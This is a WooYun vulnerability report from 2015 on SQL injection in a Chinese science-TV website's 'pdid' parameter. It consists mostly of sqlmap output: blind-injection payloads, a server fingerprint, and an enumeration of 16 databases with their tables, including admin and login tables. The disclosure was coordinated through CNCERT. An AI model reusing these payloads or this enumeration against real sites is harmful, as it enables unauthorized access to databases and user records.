当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149435

漏洞标题:中国网络科普电视台存在SQL注射16库

相关厂商:中国网络科普电视台

漏洞作者: 路人甲

提交时间:2015-10-27 16:58

修复时间:2015-12-14 18:00

公开时间:2015-12-14 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

到底这网站属于河南河北省科协信息中心还是?

详细说明:

http://**.**.**.**/pdnr.aspx?pdid=294 (GET)

<code>sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: pdid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pdid=294 AND 3529=3529
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pdid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pdid=294 AND 3529=3529
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
available databases [16]:
[*] ASPNETDB
[*] CPST_MOVIE
[*] HAST
[*] hbkxoa
[*] hbqd
[*] master
[*] model
[*] msdb
[*] nckp
[*] news
[*] Northwind
[*] psschool
[*] pubs
[*] QMSZ
[*] tempdb
[*] XYIR

</code>

漏洞证明:

available databases [16]:
[*] ASPNETDB
[*] CPST_MOVIE
[*] HAST
[*] hbkxoa
[*] hbqd
[*] master
[*] model
[*] msdb
[*] nckp
[*] news
[*] Northwind
[*] psschool
[*] pubs
[*] QMSZ
[*] tempdb
[*] XYIR
Database: nckp
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.FS_SS_Stat | 6221 |
| dbo.FS_AD_Source | 2779 |
| dbo.FS_MF_Login_Log | 242 |
| dbo.FS_NS_News | 211 |
| dbo.FS_MF_Lable | 100 |
| dbo.FS_NS_NewsClass | 67 |
| dbo.FS_MF_Oper_Log | 38 |
| dbo.FS_MF_Labestyle | 16 |
| dbo.FS_NS_General | 10 |
| dbo.FS_MF_Sub_Sys | 9 |
| dbo.FS_AD_Info | 7 |
| dbo.FS_AD_TxtInfo | 7 |
| dbo.FS_FL_FrendList | 7 |
| dbo.FS_MF_Admin | 7 |
| dbo.FS_MF_AdminGroup | 5 |
| dbo.FS_MF_LableClass | 3 |
| dbo.FS_NS_TodayPic | 2 |
| dbo.FS_AD_Class | 1 |
| dbo.FS_DS_SysPara | 1 |
| dbo.FS_FL_SysPara | 1 |
| dbo.FS_MF_Config | 1 |
| dbo.FS_NS_SysParam | 1 |
| dbo.FS_SS_SysPara | 1 |
| dbo.FS_VS_SysPara | 1 |
| dbo.FS_WS_Config | 1 |
+--------------------------------------------------+---------+
Database: QMSZ
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.FS_SS_Stat | 7007 |
| dbo.FS_NS_News | 351 |
| dbo.FS_MF_Login_Log | 152 |
| dbo.FS_MF_Lable | 89 |
| dbo.FS_NS_NewsClass | 82 |
| dbo.FS_MF_Oper_Log | 43 |
| dbo.FS_MF_Labestyle | 16 |
| dbo.FS_NS_General | 12 |
| dbo.FS_MF_Sub_Sys | 9 |
| dbo.FS_MF_AdminGroup | 5 |
| dbo.FS_MF_Admin | 4 |
| dbo.FS_MF_LableClass | 3 |
| dbo.FS_NS_TodayPic | 2 |
| dbo.FS_DS_SysPara | 1 |
| dbo.FS_FL_SysPara | 1 |
| dbo.FS_MF_Config | 1 |
| dbo.FS_NS_SysParam | 1 |
| dbo.FS_SS_SysPara | 1 |
| dbo.FS_VS_SysPara | 1 |
| dbo.FS_WS_Config | 1 |
+--------------------------------------------------+---------+
Database: ASPNETDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.aspnet_UsersInRoles | 16 |
| dbo.vw_aspnet_UsersInRoles | 16 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.aspnet_Membership | 5 |
| dbo.aspnet_Users | 5 |
| dbo.vw_aspnet_MembershipUsers | 5 |
| dbo.vw_aspnet_Users | 5 |
| dbo.aspnet_Roles | 4 |
| dbo.vw_aspnet_Roles | 4 |
| dbo.aspnet_Applications | 1 |
| dbo.vw_aspnet_Applications | 1 |
+--------------------------------------------------+---------+
Database: CPST_MOVIE
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.channel_files | 1797 |
| dbo.channel_files_details | 1797 |
| dbo.file_info | 1667 |
| dbo.column_index | 21 |
| dbo.column_info | 19 |
| dbo.channel_info | 12 |
| dbo.channel_info_view | 12 |
| dbo.recommend_site | 11 |
| dbo.zt_qunzhong | 4 |
| dbo.channel_status | 2 |
| dbo.channel_type | 2 |
| dbo.advice | 1 |
| dbo.marquee | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.RTblRelships | 6910 |
| dbo.RTblIfaceHier | 3345 |
| dbo.RTblVersionAdminInfo | 2328 |
| dbo.RTblVersions | 2328 |
| dbo.RTblNamedObj | 2191 |
| dbo.RTblIfaceMem | 1186 |
| dbo.RTblPropDefs | 794 |
| dbo.RTblClassDefs | 537 |
| dbo.RTblIfaceDefs | 452 |
| dbo.RTblProps | 392 |
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.RTblRelColDefs | 320 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.RTblRelshipDefs | 144 |
| dbo.MSdbms_datatype | 141 |
| dbo.RTblParameterDef | 136 |
| dbo.backupfile | 74 |
| dbo.RTblSites | 38 |
| dbo.backupset | 37 |
| dbo.backupmediafamily | 36 |
| dbo.backupmediaset | 36 |
| dbo.RTblRelshipProps | 28 |
| dbo.backupfilegroup | 21 |
| dbo.syscategories | 21 |
| dbo.RTblTypeLibs | 16 |
| dbo.restorefile | 10 |
| dbo.syssubsystems | 10 |
| dbo.sysalerts | 9 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.restorefilegroup | 5 |
| dbo.restorehistory | 5 |
| dbo.sysdtscategories | 3 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.RTblDatabaseVersion | 1 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.syssessions | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------------------+---------+
Database: pubs
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.roysched | 86 |
| dbo.employee | 43 |
| dbo.titleauthor | 25 |
| dbo.titleview | 25 |
| dbo.authors | 23 |
| dbo.sales | 21 |
| dbo.titles | 18 |
| dbo.jobs | 14 |
| dbo.pub_info | 8 |
| dbo.publishers | 8 |
| dbo.stores | 6 |
| dbo.discounts | 3 |
+--------------------------------------------------+---------+
Database: XYIR
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.PD_PLAYLIST | 518142 |
| dbo.MOD_IPDB | 175220 |
| dbo.ST_STFW | 21557 |
| dbo.ST_LOG | 3317 |
| dbo.ST_LMFW | 1456 |
| dbo.ST_PDFW | 653 |
| dbo.PD_MTWJ | 591 |
| dbo.PD_PDNR | 276 |
| dbo.PD_PDLM | 86 |
| dbo.PD_LMQX | 79 |
| dbo.MOD_XTBJ | 38 |
| dbo.MOD_XTJS | 26 |
| dbo.MOD_BJQX | 19 |
| dbo.MOD_YHJS | 14 |
| dbo.MOD_ZZBM | 12 |
| dbo.ST_WJLX | 10 |
| dbo.MOD_XTYH | 9 |
| dbo.MOD_XTQX | 7 |
| dbo.PD_PRODUCT | 5 |
| dbo.MOD_XTCS | 4 |
| dbo.PD_PDLJ | 3 |
| dbo.AP_TMGL | 2 |
| dbo.PD_LMSJ | 2 |
| dbo.ST_CUT | 2 |
| dbo.MOD_BACKUP | 1 |
| dbo.MOD_IPGL | 1 |
| dbo.PD_PDYD | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.dm_os_memory_objects | 45664 |
| sys.dm_os_buffer_descriptors | 34677 |
| sys.dm_os_sublatches | 13184 |
| sys.syscolumns | 11165 |
| sys.dm_os_memory_cache_entries | 11003 |
| sys.dm_exec_query_stats | 8795 |
| sys.all_parameters | 6705 |
| sys.system_parameters | 6697 |
| sys.syscacheobjects | 5696 |
| sys.dm_os_ring_buffers | 5173 |
| sys.dm_exec_cached_plans | 4867 |
| sys.trace_subclass_values | 4722 |
| sys.all_columns | 4255 |
| sys.trace_event_bindings | 3958 |
| sys.system_columns | 3696 |
| sys.syscomments | 2756 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1816 |
| sys.sysobjects | 1816 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1622 |
| sys.syspermissions | 1621 |
| sys.sysprotects | 1619 |
| sys.all_sql_modules | 1596 |
| sys.system_sql_modules | 1589 |
| sys.dm_os_virtual_address_dump | 1297 |
| sys.dm_os_performance_counters | 1032 |
| sys.sysperfinfo | 1032 |
| sys.system_internals_partition_columns | 694 |
| sys.columns | 559 |
| sys.dm_db_index_usage_stats | 457 |
| sys.dm_exec_query_transformation_stats | 376 |
| sys.stats_columns | 289 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.index_columns | 219 |
| sys.sysindexkeys | 219 |
| sys.dm_os_memory_clerks | 217 |
| sys.dm_os_wait_stats | 194 |
| sys.event_notification_event_types | 193 |
| sys.dm_os_memory_cache_clock_hands | 182 |
| sys.sysindexes | 172 |
| sys.trace_events | 171 |
| sys.stats | 165 |
| sys.dm_os_latch_stats | 136 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.system_internals_allocation_units | 112 |
| sys.indexes | 102 |
| sys.dm_db_partition_stats | 101 |
| sys.partitions | 101 |
| sys.system_internals_partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.dm_os_memory_cache_counters | 91 |
| sys.dm_os_threads | 82 |
| sys.xml_schema_types | 77 |
| sys.objects | 75 |
| sys.dm_os_worker_local_storage | 74 |
| sys.dm_os_workers | 74 |
| sys.dm_os_loaded_modules | 70 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.dm_os_memory_cache_hash_tables | 61 |
| sys.dm_os_memory_pools | 54 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| sys.dm_os_tasks | 40 |
| sys.dm_exec_query_optimizer_info | 38 |
| sys.syslanguages | 33 |
| sys.master_files | 32 |
| sys.sysaltfiles | 32 |
| sys.dm_db_missing_index_details | 30 |
| sys.dm_db_missing_index_group_stats | 30 |
| sys.dm_db_missing_index_groups | 30 |
| sys.sysprocesses | 29 |
| sys.dm_db_session_space_usage | 28 |
| sys.dm_db_task_space_usage | 28 |
| sys.server_principals | 27 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.dm_exec_sessions | 26 |
| sys.server_permissions | 25 |
| sys.dm_exec_requests | 21 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.dm_tran_active_transactions | 20 |
| sys.dm_tran_database_transactions | 20 |
| sys.dm_os_schedulers | 19 |
| sys.syslogins | 18 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_mirroring | 16 |
| sys.database_principals | 16 |
| sys.database_recovery_status | 16 |
| sys.databases | 16 |
| sys.sysdatabases | 16 |
| sys.sysusers | 16 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.schemas | 14 |
| sys.service_message_types | 14 |
| sys.xml_schema_attributes | 14 |
| sys.dm_os_stacks | 13 |
| sys.dm_os_waiting_tasks | 12 |
| sys.service_contract_message_usages | 11 |
| sys.dm_tran_locks | 10 |
| sys.sql_logins | 10 |
| sys.syslockinfo | 10 |
| INFORMATION_SCHEMA.PARAMETERS | 8 |
| sys.parameters | 8 |
| sys.procedures | 8 |
| INFORMATION_SCHEMA.ROUTINES | 7 |
| sys.sql_modules | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.service_contracts | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.endpoints | 5 |
| sys.certificates | 4 |
| sys.dm_os_hosts | 4 |
| sys.extended_procedures | 4 |
| sys.server_role_members | 4 |
| dbo.MSreplication_options | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_exec_connections | 3 |
| sys.identity_columns | 3 |
| sys.internal_tables | 3 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.dm_broker_queue_monitors | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.service_contract_usages | 2 |
| sys.sysfiles | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.filegroups | 1 |
| sys.linked_logins | 1 |
| sys.routes | 1 |
| sys.servers | 1 |
| sys.sql_dependencies | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysdepends | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysoledbusers | 1 |
| sys.sysservers | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: news
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.FS_SS_Stat | 431659 |
| dbo.FS_AD_Source | 31960 |
| dbo.FS_MF_Login_Log | 14778 |
| dbo.FS_NS_News | 5652 |
| dbo.FS_MF_Admin | 172 |
| dbo.FS_MF_Lable | 139 |
| dbo.FS_NS_NewsClass | 84 |
| dbo.FS_NS_General | 82 |
| dbo.FS_MF_Oper_Log | 77 |
| dbo.FS_NS_TodayPic | 59 |
| dbo.FS_MF_Labestyle | 24 |
| dbo.FS_AD_Info | 21 |
| dbo.FS_AD_TxtInfo | 21 |
| dbo.FS_MF_Sub_Sys | 9 |
| dbo.FS_VS_Items | 7 |
| dbo.FS_MF_AdminGroup | 5 |
| dbo.FS_MF_LableClass | 4 |
| dbo.FS_MF_POP | 4 |
| dbo.FS_DS_SysPara | 1 |
| dbo.FS_FL_SysPara | 1 |
| dbo.FS_MF_Config | 1 |
| dbo.FS_MF_StyleClass | 1 |
| dbo.FS_NS_SysParam | 1 |
| dbo.FS_SS_SysPara | 1 |
| dbo.FS_VS_Class | 1 |
| dbo.FS_VS_SysPara | 1 |
| dbo.FS_VS_Theme | 1 |
| dbo.FS_WS_Config | 1 |
+--------------------------------------------------+---------+
Database: HAST
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.w_logsite | 201841 |
| dbo.w_product | 5981 |
| dbo.w_lmqx | 426 |
| dbo.w_xtlm | 191 |
| dbo.w_bjqx | 173 |
| dbo.s_xtzh | 47 |
| dbo.d_xtlm | 27 |
| dbo.d_bjqx | 25 |
| dbo.s_xtfz | 25 |
| dbo.d_product | 23 |
| dbo.w_xtbj | 21 |
| dbo.d_xtwj | 20 |
| dbo.d_xtbj | 16 |
| dbo.d_lmqx | 9 |
| dbo.s_xtcs | 2 |
| dbo.w_sitecount | 1 |
+--------------------------------------------------+---------+
Database: hbkxoa
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.document | 1262 |
+--------------------------------------------------+---------+
Database: hbqd
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.ST_YHZH | 972 |
| dbo.ST_TBZL | 769 |
| dbo.ST_TBZT | 712 |
| dbo.ST_YHDW | 140 |
| dbo.group_unit | 16 |
| dbo.sysdiagrams | 1 |
+--------------------------------------------------+---------+
Database: Northwind
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.Orders | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.Products | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.Shippers | 3 |
+--------------------------------------------------+---------+
Database: psschool
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.file_info | 344 |
| dbo.channel_files | 204 |
| dbo.column_index | 21 |
| dbo.column_info | 19 |
| dbo.channel_info | 18 |
| dbo.channel_info_view | 18 |
| dbo.news | 18 |
| dbo.recommend_site | 11 |
| dbo.channel_status | 2 |
| dbo.channel_type | 2 |
| dbo.advice | 1 |
| dbo.marquee | 1 |
+--------------------------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s)

1.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:58

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。

最新状态:

暂无